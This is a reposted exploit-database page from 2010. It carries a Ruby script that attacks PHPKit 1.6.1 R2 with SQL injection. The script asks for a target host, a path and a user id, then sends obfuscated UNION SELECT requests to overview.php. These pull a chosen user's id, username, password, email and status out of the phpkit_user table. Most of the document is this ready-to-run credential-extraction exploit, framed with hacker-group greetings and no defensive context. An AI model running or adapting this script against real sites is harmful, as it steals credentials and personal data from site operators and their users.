Home / os / win7

[webapps / 0day] - PHPKit <= 1.6.1 R2 overview.php SQL In

Posted on 29 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>PHPKit &lt;= 1.6.1 R2 overview.php SQL Injection Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='PHPKit &lt;= 1.6.1 R2 overview.php SQL Injection Exploit by Easy Laster in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>===================================================== PHPKit &lt;= 1.6.1 R2 overview.php SQL Injection Exploit ===================================================== ----------------------------Information------------------------------------------------ +Name : PHPKit &lt;= 1.6.1 R2 overview.php SQL injection Vulnerability Exploit +Autor : Easy Laster +Date : 22.10.2010 +Script : PHPKit 1.6.1 R2 +Price : free +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents and free-hack.com +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco, --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- #!/usr/bin/ruby #4004-security-project.com #Discovered and vulnerability by Easy Laster print &quot; ######################################################### # 4004-Security-Project # ######################################################### # PhPkit 1.6.1 RC 2 SQL Injection overview.php # # Exploit # # Using Host+Path+id # # www.demo.de /forum/ 1 # # Easy Laster # ######################################################### &quot; require &#039;net/http&#039; block = &quot;#########################################################&quot; print &quot;&quot;+ block +&quot;&quot; print &quot; Enter host name (site.com)-&gt;&quot; host=gets.chomp print &quot;&quot;+ block +&quot;&quot; print &quot; Enter script path (/forum/)-&gt;&quot; path=gets.chomp print &quot;&quot;+ block +&quot;&quot; print &quot; Enter the id (id)-&gt;&quot; userid=gets.chomp print &quot;&quot;+ block +&quot;&quot; begin dir = &quot;include.php/?path=content/overview.php&amp;type=&amp;letter=%27+/**/u&quot;+ &quot;NiOn+/**/sElEcT+/**/1,2,3,concat(0x23,0x23,0x23,0x23,0x23,use&quot;+ &quot;r_id,0x23,0x23,0x23,0x23,0x23),5,6,7,8,9,10,11,12,13,14,15,16&quot;+ &quot;,17,18,19,20,21,22,23,24,25,26/**/+FrOm/**/+phpkit_user/**/+W&quot;+ &quot;HERE+/**/user_id=&quot;+ userid +&quot;--+&quot;+&quot;&amp;catid=&amp;themeid=&amp;searchtex&quot;+ &quot;t=&amp;entries=0&amp;order=&quot; http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print &quot; Userid -&gt; &quot;+(/#####(.+)#####/).match(resp.body)[1] dir = &quot;include.php/?path=content/overview.php&amp;type=&amp;letter=%27&quot;+ &quot;+/**/uNiOn+/**/sElEcT+/**/1,2,3,concat(0x23,0x23,0x23,0x23,0x2&quot;+ &quot;3,user_name,0x23,0x23,0x23,0x23,0x23),5,6,7,8,9,10,11,12,13,14&quot;+ &quot;,15,16,17,18,19,20,21,22,23,24,25,26/**/+FrOm/**/+phpkit_user/&quot;+ &quot;**/+WHERE+/**/user_id=&quot;+ userid +&quot;--+&quot;+&quot;&amp;catid=&amp;themeid=&amp;searc&quot;+ &quot;htext=&amp;entries=0&amp;order=&quot; http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print &quot; Username -&gt; &quot;+(/#####(.+)#####/).match(resp.body)[1] dir = &quot;include.php/?path=content/overview.php&amp;type=&amp;letter=%27+&quot;+ &quot;/**/uNiOn+/**/sElEcT+/**/1,2,3,concat(0x23,0x23,0x23,0x23,0x23,&quot;+ &quot;user_pw,0x23,0x23,0x23,0x23,0x23),5,6,7,8,9,10,11,12,13,14,15,1&quot;+ &quot;6,17,18,19,20,21,22,23,24,25,26/**/+FrOm/**/+phpkit_user/**/+WH&quot;+ &quot;ERE+/**/user_id=&quot;+ userid +&quot;--+&quot;+&quot;&amp;catid=&amp;themeid=&amp;searchtext=&amp;&quot;+ &quot;entries=0&amp;order=&quot; http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print &quot; Password -&gt; &quot;+(/#####(.+)#####/).match(resp.body)[1] dir = &quot;include.php/?path=content/overview.php&amp;type=&amp;letter=%27+/&quot;+ &quot;**/uNiOn+/**/sElEcT+/**/1,2,3,concat(0x23,0x23,0x23,0x23,0x23,us&quot;+ &quot;er_email,0x23,0x23,0x23,0x23,0x23),5,6,7,8,9,10,11,12,13,14,15,1&quot;+ &quot;6,17,18,19,20,21,22,23,24,25,26/**/+FrOm/**/+phpkit_user/**/+WHE&quot;+ &quot;RE+/**/user_id=&quot;+ userid +&quot;--+&quot;+&quot;&amp;catid=&amp;themeid=&amp;searchtext=&amp;en&quot;+ &quot;tries=0&amp;order=&quot; http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print &quot; Email -&gt; &quot;+(/#####(.+)#####/).match(resp.body)[1] dir = &quot;include.php/?path=content/overview.php&amp;type=&amp;letter=%27+/*&quot;+ &quot;*/uNiOn+/**/sElEcT+/**/1,2,3,concat(0x23,0x23,0x23,0x23,0x23,user&quot;+ &quot;_status,0x23,0x23,0x23,0x23,0x23),5,6,7,8,9,10,11,12,13,14,15,16,&quot;+ &quot;17,18,19,20,21,22,23,24,25,26/**/+FrOm/**/+phpkit_user/**/+WHERE+&quot;+ &quot;/**/user_id=&quot;+ userid +&quot;--+&quot;+&quot;&amp;catid=&amp;themeid=&amp;searchtext=&amp;entrie&quot;+ &quot;s=0&amp;order=&quot; http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print &quot; User Status -&gt; &quot;+(/#####(.+)#####/).match(resp.body)[1] print &quot; #########################################################&quot; rescue print &quot; Exploit failed or Hackblock&quot; end # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-29]</pre></body></html>

 

TOP